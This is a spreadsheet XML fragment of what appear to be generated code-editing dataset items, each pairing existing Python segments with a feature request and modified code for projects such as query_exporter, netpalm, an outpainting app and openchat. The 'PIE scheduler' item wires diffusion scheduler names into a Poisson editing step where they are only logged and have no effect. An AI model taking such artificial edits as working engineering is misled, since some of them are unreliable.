    <t>{'called_code_segment': 'QueryLoop._update_metric() method in query_exporter/query_exporter/loop.py', 'invoking_code_segment': 'QueryLoop._execute_query() method calling self._update_metric() in query_exporter/query_exporter/loop.py', 'feature_description': 'Add a feature to log metric update details in a more structured format by creating a structured logging mechanism that captures metric name, value, labels, and method type in a dictionary format, then logs this information in a consistent JSON-like structure for better monitoring and debugging.', 'modified_complete_code': '# File: query_exporter/query_exporter/loop.py\n\n# Modify the imports section to add json\nimport asyncio\nimport json\nfrom collections import defaultdict\nfrom collections.abc import Mapping\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom logging import Logger\nimport time\nfrom typing import (\n    Any,\n    cast,\n)\n\nfrom croniter import croniter\nfrom dateutil.tz import gettz\nfrom prometheus_aioexporter import MetricConfig, MetricsRegistry\nfrom prometheus_client import Counter\nfrom prometheus_client.metrics import MetricWrapperBase\nfrom toolrack.aio import (\n    PeriodicCall,\n    TimedCall,\n)\n\nfrom .config import (\n    DB_ERRORS_METRIC_NAME,\n    QUERIES_METRIC_NAME,\n    QUERY_LATENCY_METRIC_NAME,\n    QUERY_TIMESTAMP_METRIC_NAME,\n    Config,\n)\nfrom .db import (\n    DATABASE_LABEL,\n    DataBase,\n    DataBaseConnectError,\n    DataBaseError,\n    Query,\n    QueryTimeoutExpired,\n)\n\n# New: Add a helper class for structured metric logging\nclass MetricUpdateLog:\n    """Structured logging for metric updates."""\n    \n    def __init__(self, metric_name: str, value: Any, labels: dict[str, str], method: str):\n        self.metric_name = metric_name\n        self.value = value\n        self.labels = labels\n        self.method = method\n    \n    def to_dict(self) -&gt; dict[str, Any]:\n        """Convert metric update to dictionary format."""\n        return {\n            "metric_name": self.metric_name,\n            "value": str(self.value),\n            "labels": self.labels,\n            "method": self.method,\n            "timestamp": datetime.now().isoformat(),\n        }\n    \n    def to_json(self) -&gt; str:\n        """Convert metric update to JSON format."""\n        return json.dumps(self.to_dict())\n\n# Modify the _update_metric method in QueryLoop class\ndef _update_metric(\n    self,\n    database: DataBase,\n    name: str,\n    value: Any,\n    labels: Mapping[str, str] | None = None,\n):\n    """Update value for a metric."""\n    if value is None:\n        # don\'t fail is queries that count return NULL\n        value = 0.0\n    elif isinstance(value, Decimal):\n        value = float(value)\n    metric = self._config.metrics[name]\n    all_labels = {DATABASE_LABEL: database.config.name}\n    all_labels.update(database.config.labels)\n    if labels:\n        all_labels.update(labels)\n    labels_string = ",".join(\n        f\'{label}="{value}"\' for label, value in sorted(all_labels.items())\n    )\n    method = self._get_metric_method(metric)\n    \n    # Modify: Create structured log entry\n    metric_log = MetricUpdateLog(name, value, all_labels, method)\n    \n    # Modify: Log in both human-readable and structured formats\n    self._logger.debug(\n        f\'updating metric "{name}" {method} {value} {{{labels_string}}}\'\n    )\n    # New: Log structured metric update details\n    self._logger.debug(\n        f\'metric_update_structured: {metric_log.to_json()}\'\n    )\n    \n    metric = self._registry.get_metric(name, labels=all_labels)\n    self._update_metric_value(metric, method, value)\n    self._last_seen.update(name, all_labels, self._timestamp())\n\n# New: Add a method to retrieve structured metric logs\ndef get_metric_update_log(self, metric_name: str, value: Any, labels: dict[str, str], method: str) -&gt; MetricUpdateLog:\n    """Get a structured metric update log entry."""\n    return MetricUpdateLog(metric_name, value, labels, method)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def _update_metric(self, database: DataBase, name: str, value: Any, labels: Mapping[str, str] | None = None):\n    if value is None:\n        value = 0.0\n    elif isinstance(value, Decimal):\n        value = float(value)\n    metric = self._config.metrics[name]\n    all_labels = {DATABASE_LABEL: database.config.name}\n    all_labels.update(database.config.labels)\n    if labels:\n        all_labels.update(labels)\n    method = self._get_metric_method(metric)\n    log_message = self._format_log_message(name, method, value, all_labels)\n    self._logger.debug(log_message)\n    metric = self._registry.get_metric(name, labels=all_labels)\n    self._update_metric_value(metric, method, value)\n    self._last_seen.update(name, all_labels, self._timestamp())\n\n#New\n    def _format_log_message(self, name: str, method: str, value: Any, labels: dict):\n        labels_string = ",".join(f\'{label}=\\"{value}\\"\' for label, value in sorted(labels.items()))\n        return f\'updating metric \\"{name}\\" {method} {value} {{{labels_string}}}\'', '#file 2': 'async def _execute_query(self, query: Query, dbname: str):\n    if await self._remove_if_dooomed(query, dbname):\n        return\n    db = self._databases[dbname]\n    try:\n        metric_results = await db.execute(query)\n    except DataBaseConnectError:\n        self._increment_db_error_count(db)\n    except QueryTimeoutExpired:\n        self._increment_queries_count(db, query, \'timeout\')\n    except DataBaseError as error:\n        self._increment_queries_count(db, query, \'error\')\n        if error.fatal:\n            self._logger.debug(f\'removing doomed query \\"{query.name}\\" for database \\"{dbname}\\"\')\n            self._doomed_queries[query.name].add(dbname)\n    else:\n        for result in metric_results.results:\n            self._update_metric(database=db, name=result.metric, value=result.value, labels=result.labels)\n        if metric_results.latency:\n            self._update_query_latency_metric(db, query, metric_results.latency)\n        if metric_results.timestamp:\n            self._update_query_timestamp_metric(db, query, metric_results.timestamp)\n        self._increment_queries_count(db, query, \'success\')', '#file 3': "async def test_run_query_increase_query_error_count(self, query_tracker, config_data, make_query_loop, registry):\n    config_data['queries']['q']['sql'] = 'SELECT 100.0 AS a, 200.0 AS b'\n    query_loop = make_query_loop()\n    await query_loop.start()\n    await query_tracker.wait_failures()\n    queries_metric = registry.get_metric('queries')\n    assert metric_values(queries_metric, by_labels=('status',)) == {('error',): 1.0}", '#file 4': "def test_metric_values():\n    metric = registry.get_metric('queries')\n    assert metric_values(metric, by_labels=('status',)) == {('error',): 1.0}"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def listtemplates():\n    t = FSMTemplate()\n    res = t.get_template_list()\n    return res\n\n@return_errors\ndef gettemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.get_template()\n    return res\n\n@return_errors\ndef addtemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.add_template()\n    return res\n\n@return_errors\ndef pushtemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.push_template()\n    return res\n\n@return_errors\ndef removetemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.remove_template()\n    return res', 'invoking_code_segment': 'from netpalm.backend.core.utilities.textfsm.template import (\n    listtemplates,\n    pushtemplate,\n    addtemplate,\n    removetemplate,\n    gettemplate,\n)\n\nroutes = {\n    "getconfig": exec_command,\n    "setconfig": exec_config,\n    "listtemplates": listtemplates,\n    "gettemplate": gettemplate,\n    "addtemplate": addtemplate,\n    "pushtemplate": pushtemplate,\n    "removetemplate": removetemplate,\n    ...\n}', 'feature_description': 'Add a logging feature to track script execution times for template operations (listtemplates, gettemplate, addtemplate, pushtemplate, removetemplate). This includes timing measurements and logging of execution duration for each template operation.', 'modified_complete_code': '# File 1: netpalm/netpalm/backend/core/utilities/textfsm/template.py\n# #Modify - Add time import at the top\nimport logging\nimport os\nimport shutil\nimport typing\nimport time\nfrom collections import defaultdict\nfrom functools import wraps\n\nfrom requests import get\nfrom requests.exceptions import HTTPError\n\nfrom netpalm.backend.core.confload.confload import config\n\nlog = logging.getLogger(__name__)\n\n# ... [FSMTemplate class remains the same] ...\n\n# #New - Add execution timing decorator\ndef log_execution_time(operation_name):\n    """Decorator to log execution time of template operations"""\n    def decorator(f):\n        @wraps(f)\n        def wrapper(*args, **kwargs):\n            start_time = time.time()\n            log.info(f"Starting template operation: {operation_name}")\n            try:\n                result = f(*args, **kwargs)\n                execution_time = time.time() - start_time\n                log.info(f"Completed template operation: {operation_name} in {execution_time:.4f} seconds")\n                return result\n            except Exception as e:\n                execution_time = time.time() - start_time\n                log.error(f"Failed template operation: {operation_name} after {execution_time:.4f} seconds. Error: {str(e)}")\n                raise\n        return wrapper\n    return decorator\n\ndef return_errors(f):\n    @wraps(f)\n    def wrapper(*args, **kwargs):\n        try:\n            result_data = f(*args, **kwargs)\n        except Exception as e:\n            result_data = {\n                "status": "error",\n                "data": {"error": str(e)}\n            }\n        return result_data\n    return wrapper\n\n# #Modify - Add logging decorator to listtemplates\n@return_errors\n@log_execution_time("listtemplates")\ndef listtemplates():\n    t = FSMTemplate()\n    res = t.get_template_list()\n    return res\n\n# #Modify - Add logging decorator to gettemplate\n@return_errors\n@log_execution_time("gettemplate")\ndef gettemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.get_template()\n    return res\n\n# #Modify - Add logging decorator to addtemplate\n@return_errors\n@log_execution_time("addtemplate")\ndef addtemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.add_template()\n    return res\n\n# #Modify - Add logging decorator to pushtemplate\n@return_errors\n@log_execution_time("pushtemplate")\ndef pushtemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.push_template()\n    return res\n\n# #Modify - Add logging decorator to removetemplate\n@return_errors\n@log_execution_time("removetemplate")\ndef removetemplate(**kwargs):\n    t = FSMTemplate(**kwargs)\n    res = t.remove_template()\n    return res\n\n# File 2: netpalm/netpalm/backend/core/routes/routes.py\n# #Modify - Import statements remain the same, no changes needed\nfrom netpalm.backend.core.calls.dryrun.dryrun import dryrun\nfrom netpalm.backend.core.calls.getconfig.exec_command import exec_command\nfrom netpalm.backend.core.calls.getconfig.ncclient_get import ncclient_get\nfrom netpalm.backend.core.calls.scriptrunner.script import script_kiddy\nfrom netpalm.backend.core.calls.service.procedures import (\n    create,\n    update,\n    delete,\n    re_deploy,\n    validate,\n    health_check,\n)\nfrom netpalm.backend.core.calls.setconfig.exec_config import exec_config\nfrom netpalm.backend.core.utilities.jinja2.j2 import j2gettemplate\nfrom netpalm.backend.core.utilities.jinja2.j2 import render_j2template\nfrom netpalm.backend.core.utilities.ls.ls import list_files\nfrom netpalm.backend.core.utilities.textfsm.template import (\n    listtemplates,\n    pushtemplate,\n    addtemplate,\n    removetemplate,\n    gettemplate,\n)\n\n# #Modify - Routes dictionary with decorated functions (no changes needed as decorators are applied in template.py)\nroutes = {\n    "getconfig": exec_command,\n    "setconfig": exec_config,\n    "listtemplates": listtemplates,\n    "gettemplate": gettemplate,\n    "addtemplate": addtemplate,\n    "pushtemplate": pushtemplate,\n    "removetemplate": removetemplate,\n    "ls": list_files,\n    "script": script_kiddy,\n    "j2gettemplate": j2gettemplate,\n    "render_j2template": render_j2template,\n    "dryrun": dryrun,\n    "ncclient_get": ncclient_get,\n    "service_create": create,\n    "service_update": update,\n    "service_delete": delete,\n    "service_re_deploy": re_deploy,\n    "service_validate": validate,\n    "service_health_check": health_check,\n}'}</t>
  </si>
  <si>
    <t>{'file_1': '#Modify\n@router.post("/script", response_model=Response, status_code=201)\n@error_handle_w_cache\ndef execute_script(script: Script):\n    if isinstance(script, dict):\n        req_data = script\n    else:\n        req_data = script.dict(exclude_none=True)\n    log.info(f"Starting script execution: {script}")\n    start_time = time.time()\n    result = ntplm.execute_script(**req_data)\n    end_time = time.time()\n    log.info(f"Script execution completed in {end_time - start_time} seconds")\n    return result', 'file_2': '#Modify\nr = routes["ls"](fldr="script")\nfor script in r["data"]["task_result"]["templates"]:\n    model = script_model_finder(script_name=script)[0]\n\n    @router.post(f"/script/v1/{script}", response_model=Response, status_code=201)\n    @error_handle_w_cache\n    def execute_script(script: model):\n        if isinstance(script, dict):\n            req_data = script\n        else:\n            req_data = script.dict(exclude_none=True)\n        log.info(f"Starting script execution: {script}")\n        start_time = time.time()\n        result = ntplm.execute_script(**req_data)\n        end_time = time.time()\n        log.info(f"Script execution completed in {end_time - start_time} seconds")\n        return result', 'file_3': '#Modify\ndef execute_script(**req_data):\n    task_id = ntplm.execute_task(routes["script"], **req_data)\n    return task_id', 'file_4': '#Modify\ndef create_task(route, **kwargs):\n    task_id = ntplm.create_task_id()\n    log.info(f"Creating task: {task_id}")\n    ntplm.queue_task(task_id, route, **kwargs)\n    return task_id'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class PhotometricCorrection:\n    def __init__(self, quite=False):\n        self.get_parser("cli")\n        args=self.parser.parse_args(["--method","grid","-g","src","-s","a","-t","a","-o","a"])\n        args.mpi_sync_interval = getattr(args, "mpi_sync_interval", 0)\n        self.backend=args.backend\n        self.args=args\n        self.quite=quite\n        proc: BaseProcessor\n        proc = GridProcessor(\n            args.gradient,\n            args.backend,\n            args.cpu,\n            args.mpi_sync_interval,\n            args.block_size,\n            args.grid_x,\n            args.grid_y,\n        )\n    def run(self, original_image, inpainted_image, mode="mask_mode"):\n        # ... implementation\n        proc=self.proc\n        args=self.args\n        if proc.root:\n            n = proc.reset(src, mask, tgt, (args.h0, args.w0), (args.h1, args.w1))\n        proc.sync()\n        if proc.root:\n            result = tgt\n            t = time.time()\n        if args.p == 0:\n            args.p = args.n\n        for i in range(0, args.n, args.p):\n            if proc.root:\n                result, err = proc.step(args.p)\n                print(f"[PIE] Iter {i + args.p}, abs_err {err}")\n            else:\n                proc.step(args.p)\n        if proc.root:\n            dt = time.time() - t\n            print(f"[PIE] Time elapsed: {dt:.4f}s")\n            return Image.fromarray(result)', 'invoking_code_segment': 'try:\n    from postprocess import PhotometricCorrection\n    correction_func = PhotometricCorrection()\nexcept Exception as e:\n    print(e, "so PhotometricCorrection is disabled")\n    class DummyCorrection:\n        def __init__(self):\n            self.backend=""\n            pass\n        def run(self,a,b,**kwargs):\n            return b\n    correction_func=DummyCorrection()\n\nif "taichi" in correction_func.backend:\n    # ... subprocess handling\n    correction_func = SubprocessCorrection()\n\n# In run_outpaint function:\nfor image in images:\n    image = correction_func.run(pil.resize(image.size), image, mode=use_correction)', 'feature_description': 'Add a new feature to allow users to specify a custom scheduler for image generation in the PhotometricCorrection class. This enables users to choose different scheduling algorithms (PLMS, DDIM, K-LMS, DPM, PNDM) for the Poisson Image Editing process, providing more control over the image blending and correction behavior.', 'modified_complete_code': '# In postprocess.py - PhotometricCorrection class\n\nclass PhotometricCorrection:\n    def __init__(self, quite=False, scheduler="PLMS"):  # #Modify: Add scheduler parameter\n        self.get_parser("cli")\n        args=self.parser.parse_args(["--method","grid","-g","src","-s","a","-t","a","-o","a"])\n        args.mpi_sync_interval = getattr(args, "mpi_sync_interval", 0)\n        self.backend=args.backend\n        self.args=args\n        self.quite=quite\n        self.scheduler = scheduler  # #New: Store scheduler choice\n        proc: BaseProcessor\n        proc = GridProcessor(\n            args.gradient,\n            args.backend,\n            args.cpu,\n            args.mpi_sync_interval,\n            args.block_size,\n            args.grid_x,\n            args.grid_y,\n        )\n        print(\n            f"[PIE]Successfully initialize PIE {args.method} solver "\n            f"with {args.backend} backend and {scheduler} scheduler"  # #Modify: Include scheduler in message\n        )\n        self.proc=proc\n\n    def run(self, original_image, inpainted_image, mode="mask_mode", scheduler=None):  # #Modify: Add scheduler parameter\n        print(f"[PIE] start with scheduler: {scheduler or self.scheduler}")  # #Modify: Log scheduler\n        if mode=="disabled":\n            return inpainted_image\n        input_arr=np.array(original_image)\n        if input_arr[:,:,-1].sum()&lt;1:\n            return inpainted_image\n        output_arr=np.array(inpainted_image)\n        mask=input_arr[:,:,-1]\n        mask=255-mask\n        if mask.sum()&lt;1 and mode=="mask_mode":\n            mode=""\n        if mode=="mask_mode":\n            mask = skimage.measure.block_reduce(mask, (8, 8), np.max)\n            mask = mask.repeat(8, axis=0).repeat(8, axis=1)\n        else:\n            mask[8:-9,8:-9]=255\n        mask = mask[:,:,np.newaxis].repeat(3,axis=2)\n        nmask=mask.copy()\n        output_arr2=output_arr[:,:,0:3].copy()\n        input_arr2=input_arr[:,:,0:3].copy()\n        output_arr2[nmask&lt;128]=0\n        input_arr2[nmask&gt;=128]=0\n        output_arr2+=input_arr2\n        src = output_arr2[:,:,0:3]\n        tgt = src.copy()\n        proc=self.proc\n        args=self.args\n        # #New: Use provided scheduler or fall back to instance scheduler\n        current_scheduler = scheduler or self.scheduler\n        if proc.root:\n            n = proc.reset(src, mask, tgt, (args.h0, args.w0), (args.h1, args.w1))\n        proc.sync()\n        if proc.root:\n            result = tgt\n            t = time.time()\n        if args.p == 0:\n            args.p = args.n\n\n        for i in range(0, args.n, args.p):\n            if proc.root:\n                result, err = proc.step(args.p)\n                print(f"[PIE] Iter {i + args.p}, abs_err {err}, scheduler: {current_scheduler}")  # #Modify: Include scheduler in iteration log\n            else:\n                proc.step(args.p)\n\n        if proc.root:\n            dt = time.time() - t\n            print(f"[PIE] Time elapsed: {dt:.4f}s with {current_scheduler} scheduler")  # #Modify: Include scheduler in completion message\n            return Image.fromarray(result)\n\n    def get_parser(self,gen_type: str) -&gt; argparse.Namespace:\n        parser = argparse.ArgumentParser()\n        parser.add_argument(\n            "-v", "--version", action="store_true", help="show the version and exit"\n        )\n        parser.add_argument(\n            "--check-backend", action="store_true", help="print all available backends"\n        )\n        if gen_type == "gui" and "mpi" in ALL_BACKEND:\n            ALL_BACKEND.remove("mpi")\n        parser.add_argument(\n            "-b",\n            "--backend",\n            type=str,\n            choices=ALL_BACKEND,\n            default=DEFAULT_BACKEND,\n            help="backend choice",\n        )\n        parser.add_argument(\n            "-c",\n            "--cpu",\n            type=int,\n            default=CPU_COUNT,\n            help="number of CPU used",\n        )\n        parser.add_argument(\n            "-z",\n            "--block-size",\n            type=int,\n            default=1024,\n            help="cuda block size (only for equ solver)",\n        )\n        parser.add_argument(\n            "--method",\n            type=str,\n            choices=["equ", "grid"],\n            default="equ",\n            help="how to parallelize computation",\n        )\n        parser.add_argument("-s", "--source", type=str, help="source image filename")\n        if gen_type == "cli":\n            parser.add_argument(\n                "-m",\n                "--mask",\n                type=str,\n                help="mask image filename (default is to use the whole source image)",\n                default="",\n            )\n        parser.add_argument("-t", "--target", type=str, help="target image filename")\n        parser.add_argument("-o", "--output", type=str, help="output image filename")\n        if gen_type == "cli":\n            parser.add_argument(\n                "-h0", type=int, help="mask position (height) on source image", default=0\n            )\n            parser.add_argument(\n                "-w0", type=int, help="mask position (width) on source image", default=0\n            )\n            parser.add_argument(\n                "-h1", type=int, help="mask position (height) on target image", default=0\n            )\n            parser.add_argument(\n                "-w1", type=int, help="mask position (width) on target image", default=0\n            )\n        parser.add_argument(\n            "-g",\n            "--gradient",\n            type=str,\n            choices=["max", "src", "avg"],\n            default="max",\n            help="how to calculate gradient for PIE",\n        )\n        parser.add_argument(\n            "-n",\n            type=int,\n            help="how many iteration would you perfer, the more the better",\n            default=5000,\n        )\n        if gen_type == "cli":\n            parser.add_argument(\n                "-p", type=int, help="output result every P iteration", default=0\n            )\n        if "mpi" in ALL_BACKEND:\n            parser.add_argument(\n                "--mpi-sync-interval",\n                type=int,\n                help="MPI sync iteration interval",\n                default=100,\n            )\n        parser.add_argument(\n            "--grid-x", type=int, help="x axis stride for grid solver", default=8\n        )\n        parser.add_argument(\n            "--grid-y", type=int, help="y axis stride for grid solver", default=8\n        )\n        # #New: Add scheduler parameter\n        parser.add_argument(\n            "--pie-scheduler",\n            type=str,\n            choices=["PLMS", "DDIM", "K-LMS", "DPM", "PNDM"],\n            default="PLMS",\n            help="scheduler choice for PIE processing",\n        )\n        self.parser=parser\n\n# In utils.py - SubprocessCorrection class\nclass SubprocessCorrection:\n    def __init__(self, scheduler="PLMS"):  # #Modify: Add scheduler parameter\n        self.backend=correction_func.backend\n        self.scheduler = scheduler  # #New: Store scheduler\n        self.child= Popen(["python", "postprocess.py"], stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n    def run(self,img_input,img_inpainted,mode, scheduler=None):  # #Modify: Add scheduler parameter\n        if mode=="disabled":\n            return img_inpainted\n        base64_str_input = pil_to_base64(img_input)\n        base64_str_inpainted = pil_to_base64(img_inpainted)\n        current_scheduler = scheduler or self.scheduler  # #New: Use provided or default scheduler\n        try:\n            if self.child.poll():\n                self.child= Popen(["python", "postprocess.py"], stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n            # #Modify: Include scheduler in subprocess communication\n            self.child.stdin.write(f"{base64_str_input},{base64_str_inpainted},{mode},{current_scheduler}\\n".encode())\n            self.child.stdin.flush()\n            out = self.child.stdout.readline()\n            base64_str=out.decode().strip()\n            while base64_str and base64_str[0]=="[":\n                print(base64_str)\n                out = self.child.stdout.readline()\n                base64_str=out.decode().strip()\n            ret=base64_to_pil(base64_str)\n        except:\n            print("[PIE] not working, photometric correction is disabled")\n            ret=img_inpainted\n        return ret\n\n# In app.py - run_outpaint function\ndef run_outpaint(\n    sel_buffer_str,\n    prompt_text,\n    negative_prompt_text,\n    strength,\n    guidance,\n    step,\n    resize_check,\n    fill_mode,\n    enable_safety,\n    use_correction,\n    enable_img2img,\n    use_seed,\n    seed_val,\n    generate_num,\n    scheduler,\n    scheduler_eta,\n    interrogate_mode,\n    pie_scheduler,  # #New: Add PIE scheduler parameter\n    state,\n):\n    data = base64.b64decode(str(sel_buffer_str))\n    pil = Image.open(io.BytesIO(data))\n    if interrogate_mode:\n        if "interrogator" not in model:\n            model["interrogator"] = Interrogator()\n        interrogator = model["interrogator"]\n        img = np.array(pil)[:, :, 0:3]\n        mask = np.array(pil)[:, :, -1]\n        x, y = np.nonzero(mask)\n        if len(x) &gt; 0:\n            x0, x1 = x.min(), x.max() + 1\n            y0, y1 = y.min(), y.max() + 1\n            img = img[x0:x1, y0:y1, :]\n        pil = Image.fromarray(img)\n        interrogate_ret = interrogator.interrogate(pil)\n        return (\n            gr.update(value=",".join([sel_buffer_str]),),\n            gr.update(label="Prompt", value=interrogate_ret),\n            state,\n        )\n    width, height = pil.size\n    sel_buffer = np.array(pil)\n    cur_model = get_model()\n    images = cur_model.run(\n        image_pil=pil,\n        prompt=prompt_text,\n        negative_prompt=negative_prompt_text,\n        guidance_scale=guidance,\n        strength=strength,\n        step=step,\n        resize_check=resize_check,\n        fill_mode=fill_mode,\n        enable_safety=enable_safety,\n        use_seed=use_seed,\n        seed_val=seed_val,\n        generate_num=generate_num,\n        scheduler=scheduler,\n        scheduler_eta=scheduler_eta,\n        enable_img2img=enable_img2img,\n        width=width,\n        height=height,\n    )\n    base64_str_lst = []\n    if enable_img2img:\n        use_correction = "border_mode"\n    for image in images:\n        # #Modify: Pass PIE scheduler to correction function\n        image = correction_func.run(pil.resize(image.size), image, mode=use_correction, scheduler=pie_scheduler)\n        resized_img = image.resize((width, height), resample=SAMPLING_MODE,)\n        out = sel_buffer.copy()\n        out[:, :, 0:3] = np.array(resized_img)\n        out[:, :, -1] = 255\n        out_pil = Image.fromarray(out)\n        out_buffer = io.BytesIO()\n        out_pil.save(out_buffer, format="PNG")\n        out_buffer.seek(0)\n        base64_bytes = base64.b64encode(out_buffer.read())\n        base64_str = base64_bytes.decode("ascii")\n        base64_str_lst.append(base64_str)\n    return (\n        gr.update(label=str(state + 1), value=",".join(base64_str_lst),),\n        gr.update(label="Prompt"),\n        state + 1,\n    )\n\n# In app.py - Add PIE scheduler dropdown in UI\nwith gr.Column(scale=2, min_width=150):\n    with gr.Group():\n        with gr.Row():\n            sd_generate_num = gr.Number(\n                label="Sample number", value=1, precision=0\n            )\n            sd_strength = gr.Slider(\n                label="Strength",\n                minimum=0.0,\n                maximum=1.0,\n                value=1.0,\n                step=0.01,\n            )\n        with gr.Row():\n            sd_scheduler = gr.Dropdown(\n                list(scheduler_dict.keys()), label="Scheduler", value="DPM"\n            )\n            sd_scheduler_eta = gr.Number(label="Eta", value=0.0)\n        # #New: Add PIE scheduler dropdown\n        with gr.Row():\n            pie_scheduler = gr.Dropdown(\n                ["PLMS", "DDIM", "K-LMS", "DPM", "PNDM"],\n                label="PIE Scheduler",\n                value="PLMS"\n            )\n\n# #Modify: Update proceed_event to include pie_scheduler\nproceed_event = proceed_button.click(\n    fn=run_outpaint,\n    inputs=[\n        model_input,\n        sd_prompt,\n        sd_negative_prompt,\n        sd_strength,\n        sd_guidance,\n        sd_step,\n        sd_resize,\n        init_mode,\n        safety_check,\n        postprocess_check,\n        sd_img2img,\n        sd_use_seed,\n        sd_seed_val,\n        sd_generate_num,\n        sd_scheduler,\n        sd_scheduler_eta,\n        interrogate_check,\n        pie_scheduler,  # #New: Add PIE scheduler input\n        model_output_state,\n    ],\n    outputs=[model_output, sd_prompt, model_output_state],\n    _js=proceed_button_js,\n)'}</t>
  </si>
  <si>
    <t>{'file_1': 'def run_outpaint(...):\n    ...\n    cur_model = get_model()\n    images = cur_model.run(\n        image_pil=pil,\n        prompt=prompt_text,\n        negative_prompt=negative_prompt_text,\n        guidance_scale=guidance,\n        strength=strength,\n        step=step,\n        resize_check=resize_check,\n        fill_mode=fill_mode,\n        enable_safety=enable_safety,\n        use_seed=use_seed,\n        seed_val=seed_val,\n        generate_num=generate_num,\n        scheduler=scheduler,\n        scheduler_eta=scheduler_eta,\n        enable_img2img=enable_img2img,\n        width=width,\n        height=height,\n    )\n    ...\n    return (...)\n', 'file_2': 'proceed_event = proceed_button.click(\n    fn=run_outpaint,\n    inputs=[\n        model_input,\n        sd_prompt,\n        sd_negative_prompt,\n        sd_strength,\n        sd_guidance,\n        sd_step,\n        sd_resize,\n        init_mode,\n        safety_check,\n        postprocess_check,\n        sd_img2img,\n        sd_use_seed,\n        sd_seed_val,\n        sd_generate_num,\n        sd_scheduler,\n        sd_scheduler_eta,\n        interrogate_check,\n        model_output_state,\n    ],\n    outputs=[model_output, sd_prompt, model_output_state],\n    _js=proceed_button_js,\n)', 'file_3': 'class StableDiffusionInpaint:\n    ...\n    def run(self, ..., scheduler="", scheduler_eta=0.0, ...):\n        inpaint = self.inpaint\n        selected_scheduler = scheduler_dict.get(scheduler, scheduler_dict["PLMS"])\n        for item in [inpaint]:\n            item.scheduler = selected_scheduler\n        ...\n        images = inpaint_func(\n            prompt=prompt,\n            image=init_image.resize((process_width, process_height), resample=SAMPLING_MODE),\n            mask_image=mask_image.resize((process_width, process_height)),\n            width=process_width,\n            height=process_height,\n            **extra_kwargs,\n        )["images"]\n        ...\n        return images\n', 'file_4': 'def run_outpaint(...):\n    ...\n    images = cur_model.run(...)\n    ...\n    for image in images:\n        image = correction_func.run(pil.resize(image.size), image, mode=use_correction)\n        ...\n    return (...)\n'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'InteractiveEnvironment.pre_dialog_for_convai2(self, agent) method in openchat/openchat/envs/interactive.py', 'invoking_code_segment': 'InteractiveEnvironment.start(self, agent) method calling pre_dialog_for_special_tasks() in openchat/openchat/envs/interactive.py', 'feature_description': "Add a feature to allow users to input multiple personas for the ConvAI2Agent, separated by a specific delimiter (e.g., ';'). Users can now input multiple personas in a single line separated by semicolons, and each persona will be added individually to the agent.", 'modified_complete_code': '# File: openchat/openchat/envs/interactive.py\n\n# Modify the pre_dialog_for_convai2 method:\ndef pre_dialog_for_convai2(self, agent):\n    cprint(\n        f"[SYSTEM]: Please input [{agent.name.upper()}]\'s persona.\\n"\n        f"[SYSTEM]: You can input multiple personas separated by \';\'.\\n"  # #New\n        f"[SYSTEM]: Enter \'.done\' if you want to end input persona.\\n",\n        color=self.system_color)\n\n    while True:\n        _persona = cinput(\n            f"[{agent.name.upper()}\'s PERSONA]: ",\n            color=self.special_color,\n        )\n\n        if _persona == ".done":\n            cprint(\n                f"[{agent.name.upper()}\'s PERSONA]: Persona setting complete.\\n",\n                color=self.special_color,\n            )\n            break\n        else:\n            # #Modify: Split personas by delimiter and add each one\n            personas = _persona.split(\';\')\n            for persona in personas:\n                persona = persona.strip()  # #New: Remove whitespace\n                if persona:  # #New: Only add non-empty personas\n                    agent.add_persona(\n                        self.histories,\n                        user_id=self.user_id,\n                        text=persona,\n                    )\n            # #New: Provide feedback on number of personas added\n            valid_personas = [p.strip() for p in personas if p.strip()]\n            if valid_personas:\n                cprint(\n                    f"[SYSTEM]: Added {len(valid_personas)} persona(s).\\n",\n                    color=self.system_color,\n                )'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def pre_dialog_for_convai2(self, agent):\n    cprint(\n        f"[SYSTEM]: Please input [{agent.name.upper()}]\'s personas separated by \';\'.\\n"\n        f"[SYSTEM]: Enter \'.done\' if you want to end input personas.\\n",\n        color=self.system_color)\n\n    while True:\n        _personas = cinput(\n            f"[{agent.name.upper()}\'s PERSONAS]: ",\n            color=self.special_color,\n        )\n\n        if _personas == ".done":\n            cprint(\n                f"[{agent.name.upper()}\'s PERSONAS]: Persona setting complete.\\n",\n                color=self.special_color,\n            )\n            break\n        else:\n            for persona in _personas.split(\';\'):\n                agent.add_persona(\n                    self.histories,\n                    user_id=self.user_id,\n                    text=persona.strip(),\n                )  # Modify', '#file 2': 'def start(self, agent: BaseAgent):\n    ...\n    while True:\n        torch.cuda.empty_cache()\n        if self.is_empty(self.user_id):\n            pre_dialog_output = self.pre_dialog_for_special_tasks(agent)\n    ...\n    # Modify', '#file 3': "class ConvAI2Agent(BaseAgent):\n    ...\n    def add_persona(self, histories, user_id, text):\n        if user_id not in histories:\n            histories[user_id] = {'persona': []}\n        histories[user_id]['persona'].append(text)  # Modify", '#file 4': 'class BaseAgent:\n    ...\n    def add_persona(self, histories, user_id, text):\n        raise NotImplementedError  # Modify'}</t>
  </si>
  <si>
